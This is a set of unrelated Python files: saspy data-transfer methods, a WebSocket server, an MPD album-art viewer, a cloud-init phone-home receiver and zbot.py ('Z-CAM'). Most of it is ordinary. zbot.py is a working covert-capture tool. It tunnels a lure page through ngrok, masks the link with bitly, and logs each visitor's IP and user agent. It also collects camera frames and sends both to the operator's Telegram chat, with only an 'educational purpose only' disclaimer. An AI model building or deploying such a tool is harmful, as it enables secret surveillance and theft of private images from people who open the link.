    code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
    code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
    code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
    code += "put lr lrecl; put vn nvars; put vl;\n"
    code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
    code += "put vt;\n"
    code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
    code += "run;"

    ll = self.submit(code, "text")

    # Parse the metadata markers back out of the LOG text.
    l2 = ll['LOG'].rpartition("LRECL= ")
    l2 = l2[2].partition("\n")
    lrecl = int(l2[0])

    l2 = l2[2].partition("VARNUMS= ")
    l2 = l2[2].partition("\n")
    nvars = int(l2[0])

    l2 = l2[2].partition("\n")
    varlist = l2[2].split("\n", nvars)
    del varlist[nvars]

    l2 = l2[2].partition("VARTYPE=")
    l2 = l2[2].partition("\n")
    vartype = l2[2].split("\n", nvars)
    del vartype[nvars]

    # Step 2: get each variable's format name (firstobs/obs removed so the
    # single-row probe always sees a row).
    topts = dict(dsopts)
    topts.pop('firstobs', None)
    topts.pop('obs', None)

    code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
    code += "data work._n_u_l_l_;output;run;\n"
    code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"

    for i in range(nvars):
        code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
    code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("FMT_CATS=")
    l2 = l2[2].partition("\n")
    varcat = l2[2].split("\n", nvars)
    del varcat[nvars]

    # Step 3: open the listening socket SAS will connect back to.
    try:
        sock = socks.socket()
        if not self.sascfg.ssh or self.sascfg.tunnel:
            sock.bind(('localhost', port))
        else:
            sock.bind(('', port))
        port = sock.getsockname()[1]
    except OSError:
        print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
        return None

    if self.sascfg.ssh and not self.sascfg.tunnel:
        host = self.sascfg.hostip #socks.gethostname()
    else:
        host = 'localhost'

    code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
    code += "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";\nformat "

    idx_col = kwargs.pop('index_col', False)
    eng = kwargs.pop('engine', 'c')
    my_fmts = kwargs.pop('my_fmts', False)
    k_dts = kwargs.pop('dtype', None)
    if k_dts is None and my_fmts:
        print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
        my_fmts = False

    # Apply ISO-8601 formats to date/time/datetime vars so pandas can parse them.
    if not my_fmts:
        for i in range(nvars):
            if vartype[i] == 'N':
                code += "'"+varlist[i]+"'n "
                if varcat[i] in self._sb.sas_date_fmts:
                    code += 'E8601DA10. '
                else:
                    if varcat[i] in self._sb.sas_time_fmts:
                        code += 'E8601TM15.6 '
                    else:
                        if varcat[i] in self._sb.sas_datetime_fmts:
                            code += 'E8601DT26.6 '
                        else:
                            code += 'best32. '
    code += ";\n run;\n"
    ll = self.submit(code, "text")

    # Build the dtype map for read_csv unless the caller supplied one.
    if k_dts is None:
        dts = {}
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    dts[varlist[i]] = 'float'
                else:
                    dts[varlist[i]] = 'str'
            else:
                dts[varlist[i]] = 'str'
    else:
        dts = k_dts

    # Step 4: export CSV into the socket and read it on this end.
    code = ''
    code = "proc export data=work.sasdata2dataframe outfile=sock dbms=csv replace;\n"
    code += self._sb._expopts(opts)+" run;\n"
    code += "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"

    sock.listen(1)
    self._asubmit(code, 'text')

    if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
        print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
        sock.close()
        ll = self.submit("", 'text')
        return ll['LOG']

    newsock = (0,0)
    try:
        newsock = sock.accept()
        sockout = _read_sock(newsock=newsock, rowsep=b'\n')
        df = pd.read_csv(sockout, index_col=idx_col, encoding='utf8', engine=eng, dtype=dts, **kwargs)
    except (KeyboardInterrupt, Exception) as e:
        print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
        try:
            if newsock[0]:
                newsock[0].shutdown(socks.SHUT_RDWR)
                newsock[0].close()
        except:
            pass
        sock.close()
        ll = self.submit("", 'text')
        return str(e)+"\n\n"+ll['LOG']

    newsock[0].shutdown(socks.SHUT_RDWR)
    newsock[0].close()
    sock.close()

    ll = self.submit("", 'text')

    if k_dts is None:  # don't override these if user provided their own dtypes
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')

    return df
def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,
                          rowsep: str = '\x01', colsep: str = '\x02',
                          rowrep: str = ' ', colrep: str = ' ', port: int=0,
                          wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
    """
    This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
    table   - the name of the SAS Data Set you want to export to a Pandas Data Frame
    libref  - the libref for the SAS Data Set.
    dsopts  - data set options for the input SAS Data Set
    rowsep  - the row seperator character to use; defaults to '\x01'
    colsep  - the column seperator character to use; defaults to '\x02'
    rowrep  - the char to convert to for any embedded rowsep chars, defaults to ' '
    colrep  - the char to convert to for any embedded colsep chars, defaults to ' '
    tempfile - DEPRECATED
    tempkeep - DEPRECATED
    port    - port to use for socket. Defaults to 0 which uses a random available ephemeral port
    wait    - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout

    These two options are for advanced usage. They override how saspy imports data. For more info
    see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques

    dtype   - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
    my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=

    Flow: interrogate the data set's metadata via the SAS LOG, then stream the
    rows (rowsep/colsep delimited) through a socket fileref directly into
    pandas.read_csv - no intermediate CSV file.
    """
    # DEPRECATED options are accepted and discarded.
    tmp = kwargs.pop('tempfile', None)
    tmp = kwargs.pop('tempkeep', None)

    dsopts = dsopts if dsopts is not None else {}

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    if libref:
        tabname = libref+".'"+table.strip()+"'n "
    else:
        tabname = "'"+table.strip()+"'n "

    # Step 1: write LRECL, variable count, names and types to the LOG (STDERR).
    code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
    code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
    code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
    code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
    code += "put lr lrecl; put vn nvars; put vl;\n"
    code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
    code += "put vt;\n"
    code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
    code += "run;"

    ll = self.submit(code, "text")

    # Parse the metadata markers back out of the LOG text.
    l2 = ll['LOG'].rpartition("LRECL= ")
    l2 = l2[2].partition("\n")
    lrecl = int(l2[0])

    l2 = l2[2].partition("VARNUMS= ")
    l2 = l2[2].partition("\n")
    nvars = int(l2[0])

    l2 = l2[2].partition("\n")
    varlist = l2[2].split("\n", nvars)
    del varlist[nvars]

    l2 = l2[2].partition("VARTYPE=")
    l2 = l2[2].partition("\n")
    vartype = l2[2].split("\n", nvars)
    del vartype[nvars]

    # Step 2: get each variable's format name (firstobs/obs removed so the
    # single-row probe always sees a row).
    topts = dict(dsopts)
    topts.pop('firstobs', None)
    topts.pop('obs', None)

    code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
    code += "data work._n_u_l_l_;output;run;\n"
    code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"

    for i in range(nvars):
        code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
    code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("FMT_CATS=")
    l2 = l2[2].partition("\n")
    varcat = l2[2].split("\n", nvars)
    del varcat[nvars]

    # Step 3: open the listening socket SAS will connect back to.
    try:
        sock = socks.socket()
        if not self.sascfg.ssh or self.sascfg.tunnel:
            sock.bind(('localhost', port))
        else:
            sock.bind(('', port))
        port = sock.getsockname()[1]
    except OSError:
        print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
        return None

    if self.sascfg.ssh and not self.sascfg.tunnel:
        host = self.sascfg.hostip #socks.gethostname()
    else:
        host = 'localhost'

    code = "filename sock socket '"+host+":"+str(port)+"' recfm=s encoding='utf-8';\n"

    # Hex literals for the row/column separators, in the session encoding.
    rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
    cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"

    idx_col = kwargs.pop('index_col', False)
    eng = kwargs.pop('engine', 'c')
    my_fmts = kwargs.pop('my_fmts', False)
    k_dts = kwargs.pop('dtype', None)
    if k_dts is None and my_fmts:
        print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
        my_fmts = False

    code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"

    # Apply ISO-8601 formats to date/time/datetime vars so pandas can parse them.
    if not my_fmts:
        for i in range(nvars):
            if vartype[i] == 'N':
                code += "format '"+varlist[i]+"'n "
                if varcat[i] in self._sb.sas_date_fmts:
                    code += 'E8601DA10.'
                else:
                    if varcat[i] in self._sb.sas_time_fmts:
                        code += 'E8601TM15.6'
                    else:
                        if varcat[i] in self._sb.sas_datetime_fmts:
                            code += 'E8601DT26.6'
                        else:
                            code += 'best32.'
                code += '; '
                if i % 10 == 9:
                    code +='\n'

    # Scrub embedded separators out of char vars; mark numeric missing as '.'
    # and record each column's NA sentinel for read_csv.
    miss = {}
    code += "\nfile sock dlm="+cdelim+";\n"
    for i in range(nvars):
        if vartype[i] != 'N':
            code += "'"+varlist[i]+"'n = translate('"
            code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
                '%02x%02x' % \
                (ord(rowrep.encode(self.sascfg.encoding)), \
                ord(colrep.encode(self.sascfg.encoding))),
                '%02x%02x' % \
                (ord(rowsep.encode(self.sascfg.encoding)), \
                ord(colsep.encode(self.sascfg.encoding))))
            miss[varlist[i]] = ' '
        else:
            code += "if missing('"+varlist[i]+"'n) then '"+varlist[i]+"'n = '.'; "
            miss[varlist[i]] = '.'
        if i % 10 == 9:
            code +='\n'

    code += "\nput "
    for i in range(nvars):
        code += " '"+varlist[i]+"'n "
        if i % 10 == 9:
            code +='\n'
    code += rdelim+";\nrun;"

    # Build the dtype map for read_csv unless the caller supplied one.
    if k_dts is None:
        dts = {}
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    dts[varlist[i]] = 'float'
                else:
                    dts[varlist[i]] = 'str'
            else:
                dts[varlist[i]] = 'str'
    else:
        dts = k_dts

    quoting = kwargs.pop('quoting', 3)

    # Step 4: run the streaming DATA step and parse the socket with read_csv.
    sock.listen(1)
    self._asubmit(code, 'text')

    if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
        print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
        sock.close()
        ll = self.submit("", 'text')
        return ll['LOG']

    newsock = (0,0)
    try:
        newsock = sock.accept()
        sockout = _read_sock(newsock=newsock, rowsep=rowsep.encode())
        df = pd.read_csv(sockout, index_col=idx_col, engine=eng, header=None, names=varlist,
                         sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,
                         encoding='utf8', quoting=quoting, **kwargs)
    except (KeyboardInterrupt, Exception) as e:
        print(e)
        print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
        try:
            if newsock[0]:
                newsock[0].shutdown(socks.SHUT_RDWR)
                newsock[0].close()
        except:
            pass
        sock.close()
        ll = self.submit("", 'text')
        return str(e)+"\n\n"+ll['LOG']

    newsock[0].shutdown(socks.SHUT_RDWR)
    newsock[0].close()
    sock.close()

    ll = self.submit("", 'text')

    if k_dts is None:  # don't override these if user provided their own dtypes
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')

    return df
class _read_sock(io.StringIO):
    """File-like adapter over an accepted socket, used to feed SAS's streamed
    output straight into pandas.read_csv.

    Each read() returns only whole rows (ending in *rowsep*); any partial row
    received is buffered in self.datar for the next call.
    """

    def __init__(self, **kwargs):
        self.newsock = kwargs.get('newsock')  # (socket, address) from accept()
        self.rowsep  = kwargs.get('rowsep')   # row terminator, as bytes
        self.datar   = b""                    # leftover partial row between reads

    def read(self, size=4096):
        received = 0
        size = max(size, 4096)
        need_row = True
        # Keep receiving until we have at least `size` fresh bytes AND at
        # least one complete row, or the peer closes the connection.
        while received < size or need_row:
            chunk = self.newsock[0].recv(size)
            if not chunk:
                # Peer closed: flush what's buffered, or signal EOF.
                if not self.datar:
                    return ''
                break
            received += len(chunk)
            self.datar += chunk
            if need_row:
                need_row = self.rowsep not in self.datar
        # Hand back everything up to (and including) the last row terminator;
        # keep the trailing partial row buffered.
        head, sep, tail = self.datar.rpartition(self.rowsep)
        self.datar = tail
        return (head + sep).decode()
|
server.py | from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
import threading
class _Client(WebSocket):
    """Per-connection WebSocket handler; delegates events to the owning WS."""

    def handleMessage(self):
        # Handle each incoming message on its own thread so the server loop
        # is never blocked by a slow packet handler.
        thr = threading.Thread(target=self.process_message, args=(), kwargs={})
        # BUG FIX: was `thr.deamon = True` (typo) — it set a meaningless
        # attribute and left the worker thread non-daemonic, which could keep
        # the process alive after shutdown.
        thr.daemon = True
        thr.start()

    def handleConnected(self):
        self.WS.on_client_connect(self)

    def handleClose(self):
        self.WS.on_client_close(self)

    def process_message(self, *args):
        msg = self.data
        # Acknowledge immediately; send a real reply only if the handler
        # produced something other than "null".
        self.sendMessage("null")
        r = self.WS._p(msg)
        if (r != "null"):
            self.sendMessage(r)

    def send_message(self, m):
        self.sendMessage(m)
class _BaseWS(SimpleWebSocketServer):
    """Server subclass that tags every new client with its WS owner and an id."""

    def _constructWebSocket(self, s, a):
        client = self.websocketclass(self, s, a)
        client.WS = self.WS
        client.ID = self.WS._n_id()
        return client
class WS:
    """Tiny packet-dispatching WebSocket server.

    Messages are text packets of the form "<key>:<payload>"; a handler is
    registered per key via add_packet() and its return value (if not "null")
    is sent back to the client.
    """

    def __init__(self, a):
        # a is an (address, port) pair
        self._s = _BaseWS(a[0], a[1], _Client)
        self._s.WS = self
        self._a = a
        # NOTE: this attribute shadows the packets() method below.
        self.packets = {}
        self._s_thr = None
        self._c_id = 0

    def start(self):
        # BUG FIX: the original concatenated self._a[1] directly, which raises
        # TypeError for a non-str (e.g. int) port; format instead.
        print("WS (addr: {0} port: {1})".format(self._a[0], self._a[1]))

        def f():
            self._s.serveforever()
        self._s_thr = threading.Thread(target=f, args=(), kwargs={})
        self._s_thr.start()

    def _p(self, m):
        # Dispatch "<key>:<payload>" to the registered handler.
        k = m.split(":")[0]
        v = m[len(k) + 1:]
        if (k not in self.packets.keys()):
            self.on_error("Invalid packet!")
            return "null"
        return self.packets[k](v)

    def _n_id(self):
        # Hand out sequential client ids.
        self._c_id += 1
        return self._c_id - 1

    def on_client_connect(self, c):
        pass

    def on_client_close(self, c):
        pass

    def on_error(self, e):
        print(e)
        self._s.close()

    def packets(self):
        # NOTE: unreachable via instances — __init__ rebinds `packets` to a
        # dict, shadowing this method. Kept for interface compatibility.
        return self.packets

    def add_packet(self, k, f):
        self.packets[k] = f

    def clients(self):
        # BUG FIX: the original used c.apend(...), which raised AttributeError
        # on first use.
        return list(self._s.connections.values())

    def get_client(self, id_):
        for c in self.clients():
            if (c.ID == id_):
                return c
        return None
|
zbot.py | #!/usr/bin/python3
from telebot import types
import telebot
from constraints import API_KEY, BITLY_ACCESS_TOKEN, ngrok_auth_token
import threading
from flask import Flask, render_template, request
from datetime import datetime
import base64
import os
from pyngrok import ngrok
import pyfiglet
import logging
import pyshorteners
import requests
# Z-CAM: exposes a local Flask page through an ngrok tunnel, shares the link
# via a Telegram bot, and reports visitor info / captured camera frames back
# to the Telegram chat.
try:
    # telegram
    bot = telebot.TeleBot(API_KEY, parse_mode=None)
    # bitly
    s = pyshorteners.Shortener(api_key=BITLY_ACCESS_TOKEN)

    # colors
    class bcolors:
        # ANSI terminal escape sequences for colored console output.
        HEADER = '\033[95m'
        OKBLUE = '\033[94m'
        OKCYAN = '\033[96m'
        OKGREEN = '\033[92m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'
        ENDC = '\033[0m'
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'

    # banner
    result = pyfiglet.figlet_format("Z-CAM")
    print(f"{bcolors.OKBLUE}{result}{bcolors.ENDC}")
    print(f"\t\t\t {bcolors.BOLD}Github: @sankethj{bcolors.ENDC}")
    print("")
    # disable unwanted logs
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)
    os.environ["FLASK_ENV"] = "development"
    app = Flask(__name__)
    app.debug = False
    fport = 5000
    # webhook port
    PORT = int(os.environ.get('PORT', 5000))
    # ngrok auth-token
    ngrok.set_auth_token(ngrok_auth_token)
    public_url = ngrok.connect(fport).public_url
    # Rewrite "http://..." to "https://..." by inserting an "s" after "http".
    final_ngrok = public_url[:4] + "s" + public_url[4:]

    # telegram bot building
    @bot.message_handler(commands=["link"])
    def send_link_and_image(msg):
        # Reply with the public tunnel URL; remember the chat id so the
        # Flask handlers below can send logs/photos to the same chat.
        bot.reply_to(msg, final_ngrok)
        global user_id
        user_id = msg.chat.id

    @bot.message_handler(commands=["shorten_link"])
    def send_shortend_link(msg):
        # Reply with a bitly-shortened version of the tunnel URL.
        s_final_ngrok = s.bitly.short(final_ngrok)
        bot.reply_to(msg, s_final_ngrok)
        global user_id
        user_id = msg.chat.id

    @bot.message_handler(commands=["start"])
    def send_start_message(msg):
        bot.reply_to(msg,"Welcome.....ZCam tool is for Eductaional purpose only. Use /help for more info. Support @Team_ETF for more..... JOIN: https://youtube.com/channel/UCJnx0yDhcTLWM3ZrAtSvaIw")
        global user_id
        user_id = msg.chat.id

    @bot.message_handler(commands=["help"])
    def send_help_message(msg):
        bot.reply_to(msg,"Use /menu for menu window. Use /link to get ngrok link. Use /shorten_link to get bitly masked link.")
        global user_id
        user_id = msg.chat.id

    @bot.message_handler(commands=["menu"])
    def show_menu_page(msg):
        # Present the four commands as a one-column reply keyboard.
        markup = types.ReplyKeyboardMarkup(row_width=1)
        btn1 = types.KeyboardButton("/start")
        btn2 = types.KeyboardButton("/link")
        btn3 = types.KeyboardButton("/shorten_link")
        btn4 = types.KeyboardButton("/help")
        markup.add(btn1,btn2,btn3,btn4)
        bot.send_message(chat_id=msg.chat.id, text="Choose from menu", reply_markup=markup)
        global user_id
        user_id = msg.chat.id

    #final ngrok link
    print(f" * ngrok tunnel link -> {bcolors.OKCYAN}{final_ngrok}{bcolors.ENDC}")
    app.config["BASE_URL"] = public_url

    # flask
    @app.route("/",methods=['POST','GET'])
    def home():
        # get request
        if request.method == 'GET':
            now = str(datetime.now())
            # Pull the visitor's headers from ngrok's local inspection API.
            req = requests.get('http://localhost:4040/api/requests/http').json()
            user_agent = req['requests'][0]['request']['headers']['User-Agent'][0]
            ip_address = req['requests'][0]['request']['headers']['X-Forwarded-For'][0]
            # writing file
            file1 = open('myfile.txt', 'a')
            file1.write("Date and Time:\t")
            file1.write(str(now))
            file1.write("\nIP:\t")
            file1.write(str(ip_address))
            file1.write("\nUser-Agent:\t")
            file1.write(str(user_agent))
            file1.write("\n\n")
            file1.close()
            # sending log message to telegram bot
            # NOTE(review): relies on user_id having been set by a prior bot
            # command; a visit before any command raises NameError — confirm.
            log_msg = "Time: "+ str(now) +" "+"IP_ADDRESS: "+ str(ip_address) +" "+"USER-AGENT: "+ str(user_agent)
            to_url2 = "https://api.telegram.org/bot"+ API_KEY +"/sendMessage?chat_id="+ str(user_id) +"&text="+ str(log_msg)
            requests.get(to_url2)
            print(f"{now} \t {bcolors.OKCYAN}{ip_address}{bcolors.ENDC} \t {user_agent}\t")
        # post request
        elif request.method == 'POST':
            now = str(datetime.now())
            # setting path to save file in capture dir
            save_path = 'capture'
            file_name = 'img_'+now+'.png'
            completeName = os.path.join(save_path, file_name)
            # requesting base64 image data
            req_data = request.get_json()
            encoded = req_data['canvasData']
            # writing file
            file2 = open(completeName, 'wb')
            data = base64.b64decode(encoded)
            file2.write(data)
            file2.close()
            print(f"{bcolors.OKGREEN}[{bcolors.ENDC}+{bcolors.OKGREEN}] Cam image recieved.{bcolors.FAIL} \n ")
            # sending photo to telegram bot
            data = {"chat_id": user_id, "caption": ""}
            to_url = 'https://api.telegram.org/bot{}/sendPhoto'.format(API_KEY)
            with open(completeName, "rb") as image_file:
                requests.post(to_url, data=data, files={"photo": image_file})
        return render_template("saycheese.html")

    # threading to run flask with pyngrok smoothly
    threading.Thread(target=app.run, kwargs={"use_reloader": False}).start()
    bot.polling()
except KeyboardInterrupt:
    print(f"{bcolors.FAIL} Ending task.....\n")
|
mpd_art_box.py | #!/usr/bin/env python
import contextlib
import os
import pathlib
import threading
import time
import configargparse
import gi
import mpd
gi.require_version('Gtk', '3.0')
from gi.repository import Gio, GLib, Gtk, Gdk, GdkPixbuf # noqa: E402
version = '0.0.8'
@contextlib.contextmanager
def _mpd_client(*args, **kwargs):
    """Yield a connected MPDClient, retrying a refused connection.

    Tries up to three times, sleeping one second between attempts, and
    re-raises ConnectionRefusedError after the final failure. The client is
    always disconnected on exit.
    """
    max_tries = 3
    for try_no in range(1, max_tries + 1):
        client = mpd.MPDClient()
        try:
            client.connect(*args, **kwargs)
        except ConnectionRefusedError:
            if try_no == max_tries:
                raise
            time.sleep(1)
        else:
            break
    try:
        yield client
    finally:
        client.disconnect()
def app_main(mpd_host, mpd_port):
    """Build the album-art window and start the MPD watcher thread.

    A background thread follows the current MPD song and fetches its album
    art; the GTK main loop (started by the caller) renders it scaled to the
    window while preserving aspect ratio.
    """
    win = Gtk.Window(default_height=500, default_width=500)
    win.connect('destroy', Gtk.main_quit)
    # Black background behind letter-/pillar-boxed artwork.
    win.override_background_color(
        Gtk.StateType.NORMAL, Gdk.RGBA(red=0, green=0, blue=0))
    image = Gtk.Image()
    pixbuf = None   # current album art, shared with the MPD thread
    win_size = None  # last size the image was rendered for
    win.add(image)

    def set_image():
        # Runs on the GTK main loop (via GLib.idle_add); scales `pixbuf`
        # to fit the window, preserving aspect ratio.
        nonlocal pixbuf
        nonlocal win_size
        if pixbuf:
            win_size = win.get_size()
            win_width, win_height = win_size
            aspect = (pixbuf.get_width() / pixbuf.get_height())
            if aspect < 1:
                # Portrait: fit height first, shrink if width overflows.
                height = win_height
                width = aspect * height
                if width > win_width:
                    height = (win_width / width) * height
                    width = win_width
            else:
                # Landscape/square: fit width first, shrink if height overflows.
                width = win_width
                height = (1 / aspect) * width
                if height > win_height:
                    width = (win_height / height) * width
                    height = win_height
            image.set_from_pixbuf(
                pixbuf.scale_simple(
                    width, height, GdkPixbuf.InterpType.BILINEAR))
        else:
            image.clear()
        # Returning False removes this idle handler after one run.
        return False

    def mpd_loop():
        # Background thread: block on client.idle() and refresh the art
        # whenever the current song changes.
        nonlocal pixbuf
        with _mpd_client(mpd_host, mpd_port) as client:
            while True:
                current = client.currentsong()
                if not current:
                    pixbuf = None
                else:
                    try:
                        image_bytes = client.albumart(
                            current['file'])['binary']
                    except mpd.CommandError:
                        # No embedded/stored art for this song.
                        pixbuf = None
                    else:
                        pixbuf = GdkPixbuf.Pixbuf.new_from_stream(
                            Gio.MemoryInputStream.new_from_bytes(
                                GLib.Bytes.new(image_bytes)
                            ), None)
                GLib.idle_add(set_image)
                client.idle()

    win.show_all()

    def _on_resize(*args):
        # Re-render only when the size actually changed.
        if win.get_size() != win_size:
            set_image()

    win.connect('size-allocate', _on_resize)
    thread = threading.Thread(target=mpd_loop)
    thread.daemon = True
    thread.start()
def main():
    """Parse configuration and launch the GTK album-art window.

    The MPD host is taken from --host, then $XDG_RUNTIME_DIR/mpd/socket if
    it exists, then 'localhost'.
    """
    parser = configargparse.ArgumentParser(
        default_config_files=['~/.config/mpd-art-box/config'])
    parser.add_argument(
        '-c', '--config', is_config_file=True,
        help='config path')
    parser.add_argument(
        '--host',
        help='MPD host (default: $XDG_RUNTIME_DIR/mpd/socket or localhost)')
    parser.add_argument(
        '--port', type=int, default=6600,
        help='MPD port (default: %(default)s)')
    parser.add_argument('--version', action='version', version=version)
    args = parser.parse_args()
    mpd_host = args.host
    if mpd_host is None:
        # BUG FIX: os.environ['XDG_RUNTIME_DIR'] raised KeyError when the
        # variable was unset; the code below already expects a falsy value,
        # so use .get() and fall through to 'localhost'.
        runtime_dir = os.environ.get('XDG_RUNTIME_DIR')
        if runtime_dir:
            socket = pathlib.Path(runtime_dir) / 'mpd' / 'socket'
            if socket.exists():
                mpd_host = str(socket)
    if mpd_host is None:
        mpd_host = 'localhost'
    app_main(mpd_host, args.port)
    Gtk.main()


if __name__ == '__main__':
    main()
|
cloudinit_callback.py | #!/usr/bin/env python
# coding: utf-8
# Purpose: receives provisioned VMs info via cloud-init phone_home
from __future__ import absolute_import
import os
try:
import Queue
except ImportError:
import queue as Queue
import random
import string
import sys
import web
from collections import OrderedDict
from optparse import OptionParser
from threading import Thread, Event
from .sshutils import update_known_hosts, SshConfigGenerator
from .miscutils import (
safe_save_file,
mkdir_p,
)
class VMRegister(object):
    """POST handler which invokes CloudInitWebCallback

    web.py can't handle requests by an arbitrary callback, instead it
    insists on a class with a POST/GET/DELETE/UPDATE methods.
    """

    def POST(self):
        form = web.input()
        callback = web.ctx.globals.callback
        callback(hostname=form.hostname,
                 ip=web.ctx.ip,
                 ssh_key=form.pub_key_rsa.strip(),
                 instance_id=form.instance_id.strip(),
                 user_agent=web.ctx.env['HTTP_USER_AGENT'])
class InventoryGenerator(object):
    """Generate ansible inventory from data reported by cloud-init
    """

    def __init__(self, vms, filename=None):
        # filename=None means write() dumps the inventory to stdout.
        self._filename = filename
        roles = ['all'] + sorted(set(vm['role'] for vm in vms))
        self._inventory = OrderedDict((role, []) for role in roles)
        self._hosts_by_id = {vm['instance_id']: vm for vm in vms}
        self._hosts_by_name = {vm['vm_name'].lower(): vm for vm in vms}

    def _get_host(self, entry):
        # Prefer an exact instance-id match; fall back to the short hostname.
        by_id = self._hosts_by_id.get(entry['instance_id'])
        if by_id is not None:
            return by_id
        return self._hosts_by_name.get(entry['short_hostname'].lower(), {})

    def _role_of(self, entry):
        return self._get_host(entry).get('role', 'all')

    def _copy_extra_info(self, host, entry):
        # Windows hosts carry the admin password into the inventory entry.
        extra_info = {}
        if entry['os'] == 'windows':
            admin_password = host.get('admin_password')
            if admin_password:
                extra_info['ansible_password'] = admin_password
        return extra_info

    def add(self, hostname, ip, **kwargs):
        entry = {
            'short_hostname': hostname.split('.')[0],
            'ip': ip,
            'instance_id': kwargs['instance_id'],
            'os': kwargs.get('os', 'unix'),
        }
        host = self._get_host(entry)
        entry.update(self._copy_extra_info(host, entry))
        self._inventory[host.get('role', 'all')].append(entry)

    def _make_host_entry(self, host):
        if host['os'] == 'windows':
            fmt = ('{short_hostname} ansible_host={ip} ansible_port=5985 '
                   'ansible_connection=winrm ansible_winrm_scheme=http '
                   'ansible_winrm_transport=basic ansible_user=administrator '
                   'ansible_password={ansible_password}')
        else:
            fmt = '{short_hostname} ansible_host={ip} ansible_user=root'
        return fmt.format(**host)

    def update(self, hostname, ip, **kwargs):
        # Convenience: register the host and persist the inventory at once.
        self.add(hostname, ip, **kwargs)
        self.write()

    def _write(self, thefile):
        for role, hosts in self._inventory.items():
            thefile.write('[%s]\n' % role)
            for host in hosts:
                thefile.write(self._make_host_entry(host) + '\n')
        thefile.flush()

    def write(self):
        if self._filename is None:
            self._write(sys.stdout)
        else:
            mkdir_p(os.path.dirname(self._filename))
            with safe_save_file(self._filename) as f:
                self._write(f)
def guess_os(user_agent):
    """Classify a phone-home request as 'windows' or 'unix' by its User-Agent."""
    if user_agent is None:
        return 'unix'
    return 'windows' if 'Windows' in user_agent else 'unix'
class CloudInitWebCallback(object):
    """Accept cloud-init "phone home" POST requests

    Does two useful things
    - waits for specified VMs to be configured by cloud-init
    - manages VMs' ssh public keys in the local ~/.ssh/known_hosts file
    """

    def __init__(self, httpd_args, vms2wait=None, vm_ready_hooks=None,
                 async_hooks=None,
                 inventory_filename=None):
        """
        :param httpd_args: listen address argument(s), passed to web.py
        :param vms2wait: mapping of VM name -> role; run() ends when all have
            phoned home
        :param vm_ready_hooks: synchronous hooks invoked from the web handler
        :param async_hooks: extra hooks run on the background worker thread
        :param inventory_filename: kept for interface compatibility
        """
        self.vms2wait = vms2wait if vms2wait else {}
        self._stop_event = Event()
